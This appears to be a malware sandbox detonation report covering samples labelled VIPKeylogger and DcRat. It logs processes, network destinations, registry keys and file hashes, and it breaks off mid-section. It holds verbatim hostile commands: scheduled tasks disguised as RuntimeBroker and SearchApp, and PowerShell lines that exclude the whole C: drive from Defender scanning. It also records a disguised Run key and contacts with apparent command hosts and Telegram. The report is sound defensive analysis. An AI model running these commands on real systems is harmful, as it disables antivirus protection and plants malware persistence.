schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 9 /tr "'C:\Program Files\edge_BITS_4596_217729105\SearchApp.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files\edge_BITS_4596_217729105\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Program Files\edge_BITS_4596_217729105\SearchApp.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/7e20f84d5244aba7145631d4073af8/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/d25f591a00514bc9ba8441/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qBGrhynT9k.bat"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\SchCache\RuntimeBroker.exe
"C:\Windows\SchCache\RuntimeBroker.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0ba4ddaa-2c4c-440c-91ea-27a1f3bfde1a.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7d2ed16b-a161-447d-b2d2-35a36bb2eea3.vbs"
C:\Windows\SchCache\RuntimeBroker.exe
C:\Windows\SchCache\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20626e4a-0faf-4ef3-8ddf-a195b3f2a6e8.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3e7969a5-c762-4775-ad8b-e59e5d56ba70.vbs"
C:\Windows\SchCache\RuntimeBroker.exe
C:\Windows\SchCache\RuntimeBroker.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\016572c6-dcbe-4182-ba74-32fa00f2c5ad.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\71eb074a-ff8c-4127-bcc0-fbc231863966.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | a0889572.xsph.ru | udp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
| RU | 141.8.197.42:80 | a0889572.xsph.ru | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RCX65C0.tmp
| MD5 | 5d8505501b7faa4c7e541b0a32467a58 |
| SHA1 | ed0b9de10c38774af49d9279e25a8958817f33a7 |
| SHA256 | 1b64ed84e05604e07552ae57fe9f150e3ca6c2da17c4b4e3bef01d5d023d1bca |
| SHA512 | a1fb110b16700001f75d4f74d93746349b5e2e78d4a5dde84c00ffe4eeed914cf7a3702de507c9a287f6df54a4cc0a4010a6bc28e4b641e8d5dcf20db6a302d9 |
C:\Windows\SchCache\RuntimeBroker.exe
| MD5 | 22a708087242dc27cf3b2287dcef9c54 |
| SHA1 | edfd010cb5168ed11f6e527011862f0341f41257 |
| SHA256 | b14a69a55e6297ed6f45ff0142f11882c237dd1ec5f6d754ba81afeb79f82a5d |
| SHA512 | e7c46dcc261bb1bee2c4c7460a31f88191c44fd69d276ac4b68c91192fe4c541db42443fb25c1616ff00d254a52e7eaea2c74813a34135eeb2f0356f63e999ef |
C:\Program Files\edge_BITS_4596_217729105\SearchApp.exe
| MD5 | c4f20b3daec8da9201a5db7645dbecbc |
| SHA1 | 6840df79e3192739090b6e2eb73a02069493d920 |
| SHA256 | 93f7c3241d7f7ddd215eca92edc2c0f75588e1655bf3e82c9a4144cbce37f312 |
| SHA512 | 980aa912418c7182fb5d95e641ed33fcdbbda33b819a300b39478f46cd3e024a342533248a5feb5adbece9dd48f7b0343dd8b49fae6c1484f2486304ad68201e |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45q3dq30.1kd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\qBGrhynT9k.bat
| MD5 | 419c283ac4129c67d4061846103ce2b4 |
| SHA1 | 6fe7c117266cd2ade613ea82cf639b209ee1139f |
| SHA256 | d5ebc5a4678364498c5803df0eddf506fdee8761edbdc699cffc325d814480f5 |
| SHA512 | 774f71852835b8f67f78f547244aab11422e4732ad50f17e8a5a2db7b219ed6a76dd92f5eebbfa26e47a337e4b4630519d0848328565137c5220f01025df7ba2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 856d4328f99937476c1d34b5a03daaf8 |
| SHA1 | 367f439b74760c236f1a95cf5d7de28ff3ec4b40 |
| SHA256 | 6159722066119c162ed49973d2852c8c4420d89fcc78e69e2e7317a53f85cca1 |
| SHA512 | 7782c1f714d9c21512b46f0c3caa1c475d304f0fd9b6c4537b3c4ac3b3a5ec9a6ee83d5240867364c34c8ac7a751f90aacce6d952d5ea17af834c65a5ef5d91e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 672e8b21617ca3b368c6c154913fcfff |
| SHA1 | cb3dab8c008b5fba2af958ce2c416c01baa6a98b |
| SHA256 | b6ce484f4dcfab37c7fac91278a1d66c8b122865f12511634b8c5eac3fc081ec |
| SHA512 | 98b45d5545237042c9d4e99e6aa2d514bb643c80cccd1f79ca8e6412a7949fc235f2f6a5fc12a7f772e1af2343ab2e2fb863d161f1d0da3326e636c52513c7ad |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0c56ba5098c530bbd1cdb28d50090d39 |
| SHA1 | ff63178ea722ec2db118c81051bf85544fb6b316 |
| SHA256 | 0299d374c4b984cb0475284b966dfbe8bb08e45b93dabdf327f96a60b05273d1 |
| SHA512 | cbbf27ac30e55f4df35ae5aae50d1a2f9475dc2ac0eecf9ce0ab19adef606fff08c26d0eef5686012d36566551179afe09b15c1da1840415b1696f76324a03f2 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a39de506d9f3cb0eef9451868bf8f3ff |
| SHA1 | 183758ff7964ae923989989be46a822e0d4dc37f |
| SHA256 | d982bcb0bdbe495e997ead8d128c2f8f0bb66c41fc5e0142d4fb5bf9193e1416 |
| SHA512 | 041df31ed5f2668dcf99143cbffcc7891394f33c6229f2459cba2226f07a8fcf31e072db62c6735fdb4b9fbc103998094a735a285db84a69bb7d983ffb96efaa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5f3d606f9a5f1201bfc1f01c54e842c4 |
| SHA1 | f1917e50b557b135953ecbe63e1fc1e675b541f1 |
| SHA256 | dcc09d3b5b17ef60cb35e4148230306cdcd68d18d18a39fd5fe220c34997a32a |
| SHA512 | d85e1e1b4a552a8cdd21c4195a2ea082d3fcb40907d2a6a0ceb297f32defd1fba17d3b54dc954c26b3b731bc179bee5cfc011de3c667af47cdbe289b30fdfb38 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3f0db2be09ea50e93f81f83a58fdc049 |
| SHA1 | 862883227880dde307538079454109d35f39723e |
| SHA256 | b747c644e6479e6e921d09626c68d2df0d33d2a707f9432e5fc1b138e6c9387d |
| SHA512 | a7f4644e8f4a0dd59f47645ba7afe312c9e714f923019add5cddf6491f3466731abd66c854bdaa497c0f162c1ae08df5c6506e2171ec9d74ae5c9ffcd69f0773 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ea2f44a25582e20c2e1d21c73bbd4fa1 |
| SHA1 | d63ef1804bad1a542aeb3cf5111cd86a9111d7a1 |
| SHA256 | 43ec39d124ebadf53f254b9aef5f1d2f73526a681682d0409af5e34beb8737d8 |
| SHA512 | 49ed57cd127b56793cf2bc1dfae0ccb45d3a9eaaf9475ea7ec65b4d6782c0b846b832bedfa19e65c4b54d7a7b19dfd177bfcb3e0fadad8640c4bb6515ee2c835 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 354ebb8d437ee057dacfef36baced4e9 |
| SHA1 | 30460dbe64847ebb524d7d1fd5b9bf8a851a7626 |
| SHA256 | bcf3ba98af6ee96a3eba9bbc6bdb2ae36b883f5f1e9cdad2974cbbcb9c102237 |
| SHA512 | 1f2cb272ad33df6e34949ac4d60ec0702316d9e21992be52cd9c6abd846472e7c868a8e96b5922b016e7952e460671e5768d007e28d84940a1b956eef4705b53 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 990f2ad22e4ee8bb16d0e84568ff1c04 |
| SHA1 | 8ee103c2c4969dd252d3f136479e718361e2ace2 |
| SHA256 | 9e058905555242348650ecae8008fd39cf63bac0f3160637aab912fd54fd2578 |
| SHA512 | ab70a31915f4241c23a020a0e1c8ad5b2468c06911ceb4418b5377619953780f14070a2674858b1a7d999b356448ffdb51db6393e56f20defb291866383f5802 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Temp\0ba4ddaa-2c4c-440c-91ea-27a1f3bfde1a.vbs
| MD5 | 9d2cb3a1c306ab483d679cbc4501b77b |
| SHA1 | 3c164647f53162cd52a36e101e9e0564ed5564d0 |
| SHA256 | 7153cdad4019e129359209facf9def753001fe5feb4b589e95de99cbd700097b |
| SHA512 | ea042c73f6e931219ee1731879d7b9d635239848998a232c16c9907130a7d91bb49974cd35b355166f2befb5cd21f12713964bb4a95be1115fbe369b2e27e2bf |
C:\Users\Admin\AppData\Local\Temp\7d2ed16b-a161-447d-b2d2-35a36bb2eea3.vbs
| MD5 | e066f2f4b6ad5a9d0ea363ecb06f39fb |
| SHA1 | 11475ba0dc83b982056b11bca29b76a0c0669359 |
| SHA256 | 8fdb7c35e437cd511fbc0ef39569c3ed897ce87d37e8f4e2055debd005f5638c |
| SHA512 | 0db1a7449c6cf1eb814ed802bb3492a8d56e6cb31b139241d59b5b7972288a748c6698da2ddf3ad925a8bd57ada3fe8889fc58a0cc42d619c8e0f365ccb4db62 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log
| MD5 | 229da4b4256a6a948830de7ee5f9b298 |
| SHA1 | 8118b8ddc115689ca9dc2fe8c244350333c5ba8b |
| SHA256 | 3d63b4a66e80ed97a8d74ea9dee7645942aafbd4abf1b31afed1027e5967fe11 |
| SHA512 | 3a4ec8f720000a32bb1555b32db13236a73bb6e654e35b4de8bdb0fc0de535584bc08ebe25c7066324e86faa33e8f571a11cc4e5ef00be78e2993e228f615224 |
C:\Users\Admin\AppData\Local\Temp\20626e4a-0faf-4ef3-8ddf-a195b3f2a6e8.vbs
| MD5 | df51fa1d2b197e92d0c729951cb4eacb |
| SHA1 | 2bc7bf81c37accb381f81c83bccef9bf49ee719d |
| SHA256 | c180f6165ba171d913f166fefed5f69c040e3d20ba96435c4b728daac1d85fa4 |
| SHA512 | 6f26152fdb48083366608bad541ba556ff8f65cce319acb13c9dbd2aa3aa66776f47c436023400a52743c2a7092f276ed1308dab2515f339acb32dcad867bff4 |
C:\Users\Admin\AppData\Local\Temp\016572c6-dcbe-4182-ba74-32fa00f2c5ad.vbs
| MD5 | 0c7e8ce20911836f15b1542c555e8dcc |
| SHA1 | 0bd49cfd05078cceeb0aa301133f33dab95cbba9 |
| SHA256 | 0ca836d9c5ff38e389e3aa620d9b2ee26b4d4e7185b1a6ce8db89ac5d617b074 |
| SHA512 | 99a78e24f46d98c088e9339cb83adf08348c532888ccce3aa76e98f69778a6b90bf43ecaeed0e56ce754d76f173b85e91e8808babd2559cd8f50ddef0d1df4bd |
Analysis: behavioral9
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
VIPKeylogger
Vipkeylogger family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
| N/A | reallyfreegeoip.org | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2348 set thread context of 2752 | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe
"C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\LbXyTV.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LbXyTV" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF0B5.tmp"
C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe
"C:\Users\Admin\AppData\Local\Temp\19ec0ef7b7ce9c5d9d5a2c9ee955a5c4.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| JP | 132.226.8.169:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | reallyfreegeoip.org | udp |
| US | 104.21.112.1:443 | reallyfreegeoip.org | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ABCJFME44B4CV80LK6HC.temp
| MD5 | dcbaa970f0757370ee49b3f0c7b7285b |
| SHA1 | 75915ebf67e6e1a7f6c93610711645cdac8a653e |
| SHA256 | 378ddb79ce32e7244786209333123fc77b9ee33d9a0aaa31f6e2842353f6fc99 |
| SHA512 | f2f98a190eb20a1098d416e93002af3130a76f88c6809a0d41b62d46d49e74f77e01ffa2ba0554d9e94c2cc77a454adaf61424b42b5f71fb52da15871f3258dd |
C:\Users\Admin\AppData\Local\Temp\tmpF0B5.tmp
| MD5 | 466b40fe54d1ea6c03f569d5bb3607e2 |
| SHA1 | 1699e64c15e44b536752d2bd40799ffffbea167c |
| SHA256 | d6e49379d1626cb5811940cfb7b29b40cc313c6986b80388ed603db300ac4dc2 |
| SHA512 | 6566bff61ee5c8c730372e65fc2dd7088d94ddd5c5a796adfb2efcde2052585da18693b55173c58cadfb7a800baed853760f82c5b3a97fd3338634e5ff5dda6a |
Analysis: behavioral13
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win7-20241010-en
Max time kernel
130s
Max time network
144s
Command Line
Signatures
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Audio HD Driver = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Windows Protector.exe" | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe
"C:\Users\Admin\AppData\Local\Temp\1a76abc85db21c92e847aa3562aab0b09c56bdce383b54b6957b78314d4429f9.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iznarf.bplaced.net | udp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
| DE | 162.55.0.137:80 | iznarf.bplaced.net | tcp |
Files
memory/2848-0-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp
memory/2848-1-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-2-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-3-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-4-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-5-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-8-0x000007FEF53BE000-0x000007FEF53BF000-memory.dmp
memory/2848-9-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
memory/2848-10-0x000007FEF5100000-0x000007FEF5A9D000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2025-03-22 06:17
Reported
2025-03-22 06:45
Platform
win10v2004-20250314-en
Max time kernel
150s
Max time network
149s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
